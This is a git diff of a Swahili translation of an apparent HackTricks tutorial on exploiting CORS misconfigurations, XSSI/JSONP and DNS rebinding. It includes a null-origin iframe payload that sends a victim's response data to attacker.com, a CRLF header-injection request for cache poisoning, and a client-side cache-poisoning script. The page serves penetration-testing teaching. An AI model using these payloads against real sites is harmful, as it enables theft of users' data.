Kuna ubunifu ambapo mahali pa mtandao wa mwathiriwa unafanya kazi kama aina fulani ya uthibitisho. Hii inaruhusu kivinjari cha mwathiriwa kutumika kama proksi, ikipita uthibitisho wa msingi wa IP kufikia programu za mtandao wa ndani. Mbinu hii ina fanana na athari za DNS rebinding lakini ni rahisi zaidi kudukua.
|
||||
|
||||
### Kutafakari `Origin` katika `Access-Control-Allow-Origin`
|
||||
|
||||
|
@ -156,7 +160,7 @@ location='/log?key='+this.responseText;
|
|||
```
|
||||
### Kutumia Asili ya `null`
|
||||
|
||||
Asili ya `null`, iliyotajwa kwa hali kama vile migeuko au faili za HTML za ndani, inashikilia nafasi ya kipekee. Baadhi ya programu hupitia orodha nyeupe ya asili hii ili kurahisisha maendeleo ya ndani, kwa kubahatisha kuruhusu tovuti yoyote kujifanya kuwa na asili ya `null` kupitia kipengele cha iframe kilichowekwa kwenye sanduku, hivyo kukiuka vizuizi vya CORS.
|
||||
Asili ya `null`, iliyotajwa kwa hali kama vile migeuko au faili za HTML za ndani, inashikilia nafasi ya kipekee. Baadhi ya programu huruhusu asili hii kwa ajili ya maendeleo ya ndani, kwa kosa kuruhusu tovuti yoyote kufanana na asili ya `null` kupitia kipande cha iframe kilichowekwa kwenye sanduku, hivyo kukiuka vizuizi vya CORS.
|
||||
```html
|
||||
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
|
||||
var req = new XMLHttpRequest();
|
||||
|
@ -182,23 +186,23 @@ location='https://attacker.com//log?key='+encodeURIComponent(this.responseText);
|
|||
};
|
||||
</script>"></iframe>
|
||||
```
|
||||
### Mbinu za Kupuuza Mipangilio ya Msimbo wa Kawaida
|
||||
### Mbinu za Kupuuza Mipangilio ya Regular Expression
|
||||
|
||||
Unapokutana na orodha nyeupe ya kikoa, ni muhimu kujaribu fursa za kupuuza, kama vile kuongeza kikoa cha muhusika kwenye kikoa kilichoorodheshwa au kutumia udhaifu wa kuchukua mamlaka ya subdomain. Aidha, mifumo ya kawaida ya kutambua kikoa inayotumia mifumo ya kawaida ya kutambua kikoa inaweza kusahau nyakati katika sheria za utekelezaji wa majina ya kikoa, hivyo kutoa fursa zaidi za kupuuza.
|
||||
Uponapoona orodha ya kikoa inayoruhusiwa, ni muhimu kujaribu fursa za kupuuza, kama vile kuongeza kikoa cha muhusika kwa kikoa kilichoorodheshwa au kutumia udhaifu wa kuchukua mamlaka ya subdomain. Aidha, mifumo ya kutambua kikoa inayotumia mifumo ya regular expressions inaweza kusahau maelezo madogo katika sheria za kutaja vikoa, hivyo kutoa fursa zaidi za kupuuza.
|
||||
|
||||
### Mbinu za Kupuuza Msimbo wa Kawaida wa Kielelezo
|
||||
### Mbinu za Kupuuza za Regular Expression za Kitaalam
|
||||
|
||||
Mifumo ya Regex kawaida inazingatia herufi za alfa-numeriki, dot (.), na hyphen (-), ikisahau uwezekano mwingine. Kwa mfano, jina la kikoa lililoundwa kujumuisha herufi zinazotafsiriwa tofauti na vivinjari na mifumo ya Regex inaweza kupuuza ukaguzi wa usalama. Namna ambavyo Safari, Chrome, na Firefox vinavyoshughulikia herufi za chini (underscore) katika subdomains inaonyesha jinsi tofauti kama hizo zinavyoweza kutumika kuzunguka mantiki ya uthibitishaji wa kikoa.
|
||||
Mifumo ya Regex kawaida inazingatia herufi za alfa-numeriki, dot (.), na hyphen (-), ikisahau uwezekano mwingine. Kwa mfano, jina la kikoa lililoundwa kuingiza herufi zinazotafsiriwa tofauti na vivinjari na mifumo ya regex inaweza kupuuza ukaguzi wa usalama. Namna ambavyo Safari, Chrome, na Firefox vinavyoshughulikia herufi za chini (underscore) katika subdomains inaonyesha jinsi tofauti hizo zinavyoweza kutumika kuzunguka mantiki ya kutambua kikoa.
|
||||
|
||||
**Kwa habari zaidi na mipangilio ya ukaguzi huu wa kupuuza:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **na** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
|
||||
|
||||
![https://miro.medium.com/v2/resize:fit:720/format:webp/1\*rolEK39-DDxeBgSq6KLKAA.png](<../.gitbook/assets/image (281).png>)
|
||||
|
||||
### Kutoka XSS ndani ya subdomain
|
||||
### Kutoka XSS ndani ya Subdomain
|
||||
|
||||
Wabunifu mara nyingi hutekeleza mifumo ya ulinzi kulinda dhidi ya unyanyasaji wa CORS kwa kuorodhesha kikoa ambacho kimeruhusiwa kuomba habari. Licha ya tahadhari hizi, usalama wa mfumo si wa uhakika. Kuwepo hata wa subdomain moja yenye udhaifu ndani ya vikoa vilivyoorodheshwa kunaweza kufungua mlango wa unyanyasaji wa CORS kupitia udhaifu mwingine, kama vile XSS (Udukuzi wa Kuvuka Tovuti).
|
||||
Wabunifu mara nyingi hutekeleza mifumo ya ulinzi kulinda dhidi ya unyanyasaji wa CORS kwa kuorodhesha vikoa vinavyoruhusiwa kuomba habari. Licha ya tahadhari hizi, usalama wa mfumo si wa uhakika. Kuwepo hata wa subdomain mmoja wenye udhaifu ndani ya vikoa vilivyoorodheshwa kunaweza kufungua mlango wa unyanyasaji wa CORS kupitia udhaifu mwingine, kama vile XSS (Cross-Site Scripting).
|
||||
|
||||
Kwa mfano, fikiria hali ambapo kikoa, `requester.com`, kimeorodheshwa kufikia rasilimali kutoka kwenye kikoa kingine, `provider.com`. Mipangilio ya upande wa seva inaweza kuonekana kama hii:
|
||||
Kwa mfano, fikiria hali ambapo kikoa, `requester.com`, kimeorodheshwa kuruhusu kupata rasilimali kutoka kikoa kingine, `provider.com`. Mipangilio ya upande wa seva inaweza kuonekana kama ifuatavyo:
|
||||
```javascript
|
||||
if ($_SERVER['HTTP_HOST'] == '*.requester.com') {
|
||||
// Access data
|
||||
|
@ -212,7 +216,7 @@ Katika hali hii, subdomains zote za `requester.com` zinaruhusiwa kupata upatikan
|
|||
|
||||
[**Kutoka kwa utafiti huu**](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
||||
|
||||
Inawezekana kwamba kwa kudanganya cache upande wa seva kupitia kuingiza kichwa cha HTTP, udhaifu wa Stored Cross-Site Scripting (XSS) unaweza kusababishwa. Hali hii inatokea wakati programu inashindwa kusafisha kichwa cha `Origin` kwa herufi haramu, ikiumba udhaifu hasa kwa watumiaji wa Internet Explorer na Edge. Vivinjari hivi vinachukulia (0x0d) kama kifaa halali cha kumaliza kichwa cha HTTP, ikisababisha udhaifu wa kuingiza kichwa cha HTTP.
|
||||
Kuna uwezekano wa kudanganya cache upande wa seva kupitia kuingiza kichwa cha HTTP, udhaifu wa Stored Cross-Site Scripting (XSS) unaweza kusababishwa. Hali hii inatokea wakati programu inashindwa kusafisha kichwa cha `Origin` kwa herufi haramu, ikiumba udhaifu hasa kwa watumiaji wa Internet Explorer na Edge. Vivinjari hivi vinachukulia (0x0d) kama kifaa halali cha kumaliza kichwa cha HTTP, ikisababisha udhaifu wa kuingiza kichwa cha HTTP.
|
||||
|
||||
Zingatia ombi lifuatalo ambapo kichwa cha `Origin` kimebadilishwa:
|
||||
```
|
||||
|
@ -225,9 +229,9 @@ HTTP/1.1 200 OK
|
|||
Access-Control-Allow-Origin: z
|
||||
Content-Type: text/html; charset=UTF-7
|
||||
```
|
||||
Wakati wa kudukua udhaifu huu moja kwa moja kwa kufanya kivinjari cha wavuti kutuma kichwa kilichoharibika sio jambo linalowezekana, ombi lililoundwa kwa makini linaweza kuzalishwa kwa mkono kwa kutumia zana kama Burp Suite. Njia hii inaweza kusababisha cache ya upande wa seva kuokoa jibu na kwa bahati mbaya kulitumikia kwa wengine. Mzigo ulioandaliwa lengo lake ni kubadilisha seti ya herufi ya ukurasa kuwa UTF-7, nambari ya herufi mara nyingi inayohusishwa na udhaifu wa XSS kutokana na uwezo wake wa kuweka herufi kwa njia ambayo inaweza kutekelezwa kama script katika muktadha fulani.
|
||||
Wakati wa kudukua udhaifu huu moja kwa moja kwa kufanya kivinjari cha wavuti kutuma kichwa kilichoharibika sio jambo linalowezekana, ombi lililoundwa kwa makini linaweza kuzalishwa kwa mkono kwa kutumia zana kama Burp Suite. Njia hii inaweza kusababisha cache ya upande wa seva kuokoa jibu na kulisambaza kwa wengine kwa bahati mbaya. Mzigo ulioandaliwa lengo lake ni kubadilisha seti ya herufi ya ukurasa kuwa UTF-7, nambari ya herufi mara nyingi inayohusishwa na udhaifu wa XSS kutokana na uwezo wake wa kuweka herufi kwa njia ambayo inaweza kutekelezwa kama script katika muktadha fulani.
|
||||
|
||||
Kwa kusoma zaidi kuhusu udhaifu wa XSS uliowekwa, angalia [PortSwigger](https://portswigger.net/web-security/cross-site-scripting/stored).
|
||||
Kwa kusoma zaidi kuhusu udhaifu wa XSS uliohifadhiwa, angalia [PortSwigger](https://portswigger.net/web-security/cross-site-scripting/stored).
|
||||
|
||||
**Angalizo**: Kutumia vibaya udhaifu wa kuingiza kichwa cha HTTP, hasa kupitia sumu ya cache ya upande wa seva, inathibitisha umuhimu mkubwa wa kuthibitisha na kusafisha mwingiliano wote unaotolewa na mtumiaji, ikiwa ni pamoja na vichwa vya HTTP. Tumia mfano thabiti wa usalama ambao unajumuisha uthibitishaji wa mwingiliano ili kuzuia udhaifu kama huo.
|
||||
|
||||
|
@ -235,11 +239,11 @@ Kwa kusoma zaidi kuhusu udhaifu wa XSS uliowekwa, angalia [PortSwigger](https://
|
|||
|
||||
[Kutoka kwa utafiti huu](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
||||
|
||||
Katika hali hii, kipengele cha ukurasa wa wavuti kinachoonyesha maudhui ya kichwa cha HTTP cha desturi bila usimbaji sahihi kinaonekana. Kwa usahihi, ukurasa wa wavuti unarudisha nyuma maudhui yaliyomo kwenye kichwa cha `X-User-id`, ambacho kinaweza kuwa na JavaScript mbaya, kama ilivyoonyeshwa na mfano ambapo kichwa kina picha ya SVG iliyoundwa kutekeleza msimbo wa JavaScript wakati wa kupakia.
|
||||
Katika hali hii, kipengele cha ukurasa wa wavuti kinachoonyesha maudhui ya kichwa cha HTTP cha desturi bila usimbaji sahihi kinaonekana. Kwa usahihi, ukurasa wa wavuti unarudisha nyuma maudhui yaliyomo kwenye kichwa cha `X-User-id`, ambacho kinaweza kuwa na JavaScript yenye nia mbaya, kama inavyodhihirishwa na mfano ambapo kichwa kina picha ya SVG iliyoundwa kutekeleza msimbo wa JavaScript wakati wa kupakia.
|
||||
|
||||
Sera za Kugawana Rasmi za Rasmi (CORS) huruhusu kutuma vichwa vya desturi. Walakini, bila jibu kutolewa moja kwa moja na kivinjari kutokana na vizuizi vya CORS, matumizi ya sindano kama hiyo yanaweza kuonekana kuwa na kikomo. Hatua muhimu inatokea wakati wa kuzingatia tabia ya cache ya kivinjari. Ikiwa kichwa cha `Vary: Origin` hakijatajwa, inawezekana kwa jibu la madhara kuhifadhiwa na kivinjari. Kufuatia hili, jibu lililohifadhiwa linaweza kuonyeshwa moja kwa moja wakati wa kutembelea URL, ikipuuza haja ya uonyeshaji moja kwa moja wakati wa ombi la awali. Mfumo huu unaimarisha uaminifu wa shambulio kwa kutumia cache ya upande wa mteja.
|
||||
Sera za Kugawiza Rasilmali za Asili (CORS) huruhusu kutuma vichwa vya desturi. Walakini, bila jibu kutolewa moja kwa moja na kivinjari kutokana na vizuizi vya CORS, matumizi ya kuingiza kama hilo yanaweza kuonekana kuwa na kikomo. Hatua muhimu inatokea wakati wa kuzingatia tabia ya cache ya kivinjari. Ikiwa kichwa cha `Vary: Origin` hakijatajwa, inawezekana kwa jibu lenye nia mbaya kuhifadhiwa kwenye cache ya kivinjari. Baadaye, jibu hili lililohifadhiwa linaweza kuonyeshwa moja kwa moja wakati wa kutembelea URL, kwa kuvuka haja ya kuonyesha moja kwa moja wakati wa ombi la awali. Mfumo huu unaimarisha uaminifu wa shambulio kwa kutumia cache ya upande wa mteja.
|
||||
|
||||
Kuonyesha shambulio hili, mfano wa JavaScript unatolewa, ulioundwa kutekelezwa katika mazingira ya ukurasa wa wavuti, kama vile kupitia JSFiddle. Skripti hii inatekeleza hatua rahisi: inatuma ombi kwa URL iliyospecifikwa na kichwa cha desturi kinachojumuisha JavaScript mbaya. Baada ya kukamilisha ombi kwa mafanikio, inajaribu kutembelea URL ya lengo, ikisababisha utekelezaji wa script iliyosindikwa ikiwa jibu limehifadhiwa bila kushughulikiwa kwa kichwa cha `Vary: Origin`.
|
||||
Kuonyesha shambulio hili, mfano wa JavaScript unatolewa, ulioundwa kutekelezwa katika mazingira ya ukurasa wa wavuti, kama vile kupitia JSFiddle. Skripti hii inatekeleza hatua rahisi: inatuma ombi kwa URL iliyospecifikwa na kichwa cha desturi kinachojumuisha JavaScript yenye nia mbaya. Baada ya kukamilisha ombi kwa mafanikio, inajaribu kutembea kwenye URL ya lengo, ikisababisha utekelezaji wa msimbo ulioingizwa ikiwa jibu limehifadhiwa bila kushughulikiwa kwa kichwa cha `Vary: Origin`.
|
||||
|
||||
Hapa kuna maelezo mafupi ya JavaScript uliotumika kutekeleza shambulio hili:
|
||||
```html
|
||||
|
@ -257,9 +261,9 @@ req.send();
|
|||
|
||||
### XSSI (Unganuzi wa Skripti wa Tovuti) / JSONP
|
||||
|
||||
XSSI, inayojulikana pia kama Unganuzi wa Skripti wa Tovuti, ni aina ya udhaifu inayotumia ukweli kwamba Sera ya Asili Sawa (SOP) haitekelezwi wakati wa kuingiza rasilimali kwa kutumia lebo ya skripti. Hii ni kwa sababu skripti inahitaji kuweza kuingizwa kutoka kwa udomeni tofauti. Udhaifu huu huruhusu mshambuliaji kupata na kusoma yaliyomo yoyote yaliyokuwa yamejumuishwa kwa kutumia lebo ya skripti.
|
||||
XSSI, inayojulikana pia kama Unganuzi wa Skripti wa Tovuti, ni aina ya udhaifu ambao unatumia ukweli kwamba Sera ya Asili Sawa (SOP) haitekelezwi wakati wa kuingiza rasilimali kwa kutumia lebo ya skripti. Hii ni kwa sababu skripti inahitaji kuweza kuingizwa kutoka uwanja tofauti. Udhaifu huu huruhusu mshambuliaji kupata na kusoma yaliyomo yoyote yaliyokuwa yamejumuishwa kwa kutumia lebo ya skripti.
|
||||
|
||||
Udhaifu huu unakuwa muhimu hasa linapokuja suala la JavaScript ya kudumu au JSONP (JSON na Padding), hasa wakati habari za mamlaka ya mazingira kama vidakuzi vinatumika kwa uthibitishaji. Wakati unapoomba rasilimali kutoka kwa mwenyeji tofauti, vidakuzi hujumuishwa, hivyo kufanya viweze kupatikana na mshambuliaji.
|
||||
Udhaifu huu unakuwa muhimu hasa linapokuja suala la JavaScript ya kudumu au JSONP (JSON na Padding), hasa wakati habari za mamlaka ya mazingira kama vidakuzi vinatumika kwa uthibitishaji. Wakati unapoomba rasilimali kutoka kwenye mwenyeji tofauti, vidakuzi hujumuishwa, hivyo kufanya viweze kupatikana na mshambuliaji.
|
||||
|
||||
Ili kuelewa vizuri na kupunguza udhaifu huu, unaweza kutumia programu-jalizi ya BurpSuite inayopatikana kwenye [https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp). Programu-jalizi hii inaweza kusaidia kutambua na kushughulikia udhaifu wa XSSI katika maombi yako ya wavuti.
|
||||
|
||||
|
@ -269,14 +273,14 @@ Jaribu kuongeza **`callback`** **parameta** katika ombi. Labda ukurasa ulikuwa u
|
|||
|
||||
![](<../.gitbook/assets/image (853).png>)
|
||||
|
||||
### Kupita Rahisi (isiyofaa?)
|
||||
### Kupita kwa urahisi (bila maana?)
|
||||
|
||||
Njia moja ya kupita kizuizi cha `Access-Control-Allow-Origin` ni kwa kuomba programu-jalizi ya wavuti kutuma ombi kwa niaba yako na kutuma jibu. Hata hivyo, katika hali hii, siri za mwisho wa mwathiriwa hazitatumwa kwani ombi linatolewa kwa udomeni tofauti.
|
||||
Njia moja ya kupita kizuizi cha `Access-Control-Allow-Origin` ni kwa kuomba programu-jalizi ya wavuti kutuma ombi kwa niaba yako na kutuma majibu. Hata hivyo, katika hali hii, siri za mwisho wa mwathiriwa hazitatumwa kwani ombi linatolewa kwa uwanja tofauti.
|
||||
|
||||
1. [**CORS-escape**](https://github.com/shalvah/cors-escape): Zana hii hutoa proksi inayopeleka ombi lako pamoja na vichwa vyake, huku ikidanganya pia kichwa cha Asili ili kulingana na udomeni ulioombwa. Hii inapita kwa ufanisi sera ya CORS. Hapa kuna matumizi ya mfano na XMLHttpRequest:
|
||||
2. [**simple-cors-escape**](https://github.com/shalvah/simple-cors-escape): Zana hii inatoa njia mbadala ya kupeleka maombi. Badala ya kupeleka ombi lako kama lilivyo, seva inafanya ombi lake lenyewe na vigezo vilivyowekwa.
|
||||
1. [**CORS-escape**](https://github.com/shalvah/cors-escape): Zana hii hutoa proksi ambayo inapeleka ombi lako pamoja na vichwa vyake, huku ikidanganya pia kichwa cha Asili ili kulingana na uwanja ulioombwa. Hii inapita kwa ufanisi sera ya CORS. Hapa kuna matumizi ya mfano na XMLHttpRequest:
|
||||
2. [**simple-cors-escape**](https://github.com/shalvah/simple-cors-escape): Zana hii inatoa njia mbadala ya kusambaza maombi. Badala ya kusambaza ombi lako kama lilivyo, seva inafanya ombi lake lenyewe na vigezo vilivyowekwa.
|
||||
|
||||
### Iframe + Kupita ya Kidirisha
|
||||
### Iframe + Kupita kwa Popup
|
||||
|
||||
Unaweza **kupita ukaguzi wa CORS** kama `e.origin === window.origin` kwa **kuunda iframe** na **kufungua dirisha jipya** kutoka kwake. Taarifa zaidi katika ukurasa ufuatao:
|
||||
|
||||
|
@ -289,7 +293,7 @@ Unaweza **kupita ukaguzi wa CORS** kama `e.origin === window.origin` kwa **kuund
|
|||
DNS rebinding kupitia TTL ni mbinu inayotumika kupita hatua fulani za usalama kwa kubadilisha rekodi za DNS. Hivi ndivyo inavyofanya kazi:
|
||||
|
||||
1. Mshambuliaji anaunda ukurasa wa wavuti na kufanya mwathiriwa aifikie.
|
||||
2. Mshambuliaji kisha hubadilisha DNS (IP) ya udomeni wao ili ielekeze kwenye ukurasa wa wavuti wa mwathiriwa.
|
||||
2. Mshambuliaji kisha hubadilisha DNS (IP) ya kikoa chao ili ielekeze kwenye ukurasa wa wavuti wa mwathiriwa.
|
||||
3. Kivinjari cha mwathiriwa hufanya jibu la DNS, ambalo linaweza kuwa na thamani ya TTL (Muda wa Kuishi) inayoonyesha muda gani rekodi ya DNS inapaswa kuchukuliwa kuwa halali.
|
||||
4. Wakati TTL inapomalizika, kivinjari cha mwathiriwa hufanya ombi jipya la DNS, kuruhusu mshambuliaji kutekeleza msimbo wa JavaScript kwenye ukurasa wa mwathiriwa.
|
||||
5. Kwa kudumisha udhibiti juu ya IP ya mwathiriwa, mshambuliaji anaweza kukusanya taarifa kutoka kwa mwathiriwa bila kutuma vidakuzi kwa seva ya mwathiriwa.
|
||||
|
@ -308,24 +312,24 @@ Unaweza pia kuchunguza seva inayofanya kazi hadharani kwa [http://rebind.it/sing
|
|||
|
||||
DNS rebinding kupitia kufurika kwa akiba ya DNS ni mbinu nyingine inayotumika kupita mifumo ya kuhifadhi akiba ya vivinjari na kulazimisha ombi la pili la DNS. Hivi ndivyo inavyofanya kazi:
|
||||
|
||||
1. Kwanza, wakati mwathiriwa anafanya ombi la DNS, jibu linajibiwa na anwani ya IP ya mshambuliaji.
|
||||
2. Ili kupita ulinzi wa kuhifadhi akiba, mshambuliaji anatumia mfanyakazi wa huduma. Mfanyakazi wa huduma hufurika akiba ya DNS, ambayo kimsingi inafuta jina la mwenyeji wa mshambuliaji lililohifadhiwa.
|
||||
3. Wakati kivinjari cha mwathiriwa kinapofanya ombi la pili la DNS, sasa jibu linajibiwa na anwani ya IP 127.0.0.1, ambayo kwa kawaida inahusu localhost.
|
||||
1. Kwanza, wakati mwathiriwa anafanya ombi la DNS, jibu linakuwa na anwani ya IP ya mshambuliaji.
|
||||
2. Ili kupita ulinzi wa akiba, mshambuliaji anatumia mfanyakazi wa huduma. Mfanyakazi wa huduma hufurika akiba ya DNS, ambayo kimsingi inafuta jina la seva la mshambuliaji lililohifadhiwa.
|
||||
3. Wakati kivinjari cha mwathiriwa kinapofanya ombi la pili la DNS, sasa jibu linakuwa na anwani ya IP 127.0.0.1, ambayo kwa kawaida inahusu localhost.
|
||||
|
||||
Kwa kufurika kwa akiba ya DNS na mfanyakazi wa huduma, mshambuliaji anaweza kudanganya mchakato wa ufumbuzi wa DNS na kulazimisha kivinjari cha mwathiriwa kufanya ombi la pili, wakati huu likitatuliwa kwa anwani ya IP inayotakiwa na mshambuliaji.
|
||||
|
||||
### DNS Rebinding kupitia **Akiba**
|
||||
|
||||
Njia nyingine ya kupita ulinzi wa kuhifadhi akiba ni kwa kutumia anwani za IP nyingi kwa subdomain moja katika mtoa huduma wa DNS. Hivi ndivyo inavyofanya kazi:
|
||||
Njia nyingine ya kupita ulinzi wa akiba ni kwa kutumia anwani za IP nyingi kwa subdomain moja katika mtoa huduma wa DNS. Hivi ndivyo inavyofanya kazi:
|
||||
|
||||
1. Mshambuliaji anaweka rekodi mbili za A (au rekodi moja ya A na anwani mbili za IP) kwa subdomain moja katika mtoa huduma wa DNS.
|
||||
2. Wakati kivinjari kinachunguza rekodi hizi, kinapokea anwani zote mbili za IP.
|
||||
3. Ikiwa kivinjari kinaamua kutumia anwani ya IP ya mshambuliaji kwanza, mshambuliaji anaweza kutumikia mzigo wa data ambao unafanya maombi ya HTTP kwa udomeni huo huo.
|
||||
3. Ikiwa kivinjari kinaamua kutumia anwani ya IP ya mshambuliaji kwanza, mshambuliaji anaweza kutumikia mzigo wa data ambao unafanya maombi ya HTTP kwa kikoa kimoja.
|
||||
4. Hata hivyo, mara tu mshambuliaji anapopata anwani ya IP ya mwathiriwa, hawajibu tena kwa kivinjari cha mwathiriwa.
|
||||
5. Kivinjari cha mwathiriwa, baada ya kugundua kuwa udomeni haipatikani, huendelea kutumia anwani ya IP iliyotolewa ya pili.
|
||||
5. Kivinjari cha mwathiriwa, baada ya kugundua kuwa kikoa hakijibu, huendelea kutumia anwani ya IP iliyotolewa ya pili.
|
||||
6. Kwa kufikia anwani ya pili ya IP, kivinjari kinapita Sera ya Asili Sawa (SOP), kuruhusu mshambuliaji kutumia hii na kukusanya na kutuma taarifa.
|
||||
|
||||
Mbinu hii inatumia tabia ya vivinjari wakati anwani za IP nyingi zinapotolewa kwa udomeni. Kwa kudhibiti majibu na kudanganya chaguo la anwani ya IP la kivinjari, mshambuliaji anaweza kutumia SOP na kupata taarifa kutoka kwa mwathiriwa.
|
||||
Mbinu hii inatumia tabia ya vivinjari wakati anwani za IP nyingi zinapatikana kwa kikoa. Kwa kudhibiti majibu na kudanganya chaguo la anwani ya IP ya kivinjari, mshambuliaji anaweza kutumia SOP na kupata taarifa kutoka kwa mwathiriwa.
|
||||
|
||||
{% hint style="warning" %}
|
||||
Tafadhali kumbuka kwamba ili kufikia localhost unapaswa kujaribu kurejesha **127.0.0.1** kwenye Windows na **0.0.0.0** kwenye linux.\
|
||||
|
@ -343,20 +347,20 @@ Kwa habari zaidi unaweza kucheki [https://unit42.paloaltonetworks.com/dns-rebind
|
|||
|
||||
### Silaha ya DNS Rebidding
|
||||
|
||||
Unaweza kupata maelezo zaidi kuhusu mbinu za kuvuka zilizotangulia na jinsi ya kutumia zana ifuatayo katika mazungumzo [Gerald Doussot - Hali ya Mashambulizi ya DNS Rebinding & Umoja wa Asili - Mkutano wa DEF CON 27](https://www.youtube.com/watch?v=y9-0lICNjOQ).
|
||||
Unaweza kupata habari zaidi kuhusu mbinu za kuvuka zilizotangulia na jinsi ya kutumia zana ifuatayo katika mazungumzo [Gerald Doussot - Hali ya Mashambulizi ya DNS Rebinding & Umoja wa Asili - Mkutano wa DEF CON 27](https://www.youtube.com/watch?v=y9-0lICNjOQ).
|
||||
|
||||
[**`Umoja wa Asili`**](https://github.com/nccgroup/singularity) ni zana ya kufanya mashambulizi ya [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding). Inajumuisha vipengele muhimu vya kurekebisha anwani ya IP ya jina la DNS la seva ya shambulizi kwa anwani ya IP ya mashine ya lengo na kutumikia mzigo wa mashambulizi kwa kudhoofisha programu zilizovunjika kwenye mashine ya lengo.
|
||||
[**`Umoja wa Asili`**](https://github.com/nccgroup/singularity) ni zana ya kufanya mashambulizi ya [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding). Inajumuisha vipengele vinavyohitajika kurekebisha anwani ya IP ya jina la DNS la seva ya shambulizi kwa anwani ya IP ya mashine ya lengo na kutumikia mzigo wa mashambulizi kwa kufaidika na programu dhaifu kwenye mashine ya lengo.
|
||||
|
||||
### Kinga Halisi dhidi ya DNS Rebinding
|
||||
|
||||
* Tumia TLS kwenye huduma za ndani
|
||||
* Omba uthibitisho wa kufikia data
|
||||
* Tumia TLS katika huduma za ndani
|
||||
* Omba uthibitisho wa kupata data
|
||||
* Thibitisha kichwa cha Mwenyeji
|
||||
* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/): Pendekezo la kutuma ombi la awali daima wakati seva za umma zinataka kufikia seva za ndani
|
||||
* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/): Pendekezo la kutuma ombi la awali daima wakati seva za umma zinataka kupata seva za ndani
|
||||
|
||||
## **Zana**
|
||||
|
||||
**Fanya majaribio ya kiotomatiki ya misconfigurations inayowezekana katika sera za CORS**
|
||||
**Fanya majaribio ya kufadhaisha katika mipangilio isiyofaa ya CORS**
|
||||
|
||||
* [https://portswigger.net/bappstore/420a28400bad4c9d85052f8d66d3bbd8](https://portswigger.net/bappstore/420a28400bad4c9d85052f8d66d3bbd8)
|
||||
* [https://github.com/chenjj/CORScanner](https://github.com/chenjj/CORScanner)
|
||||
|
@ -377,15 +381,20 @@ Unaweza kupata maelezo zaidi kuhusu mbinu za kuvuka zilizotangulia na jinsi ya k
|
|||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration)
|
||||
* [https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b](https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b)
|
||||
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka mwanzo hadi kuwa shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
|
|
|
@ -1,64 +1,73 @@
|
|||
# Kuchanganyikiwa kwa Utegemezi
|
||||
# Kutokuwepo kwa Utegemezi
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
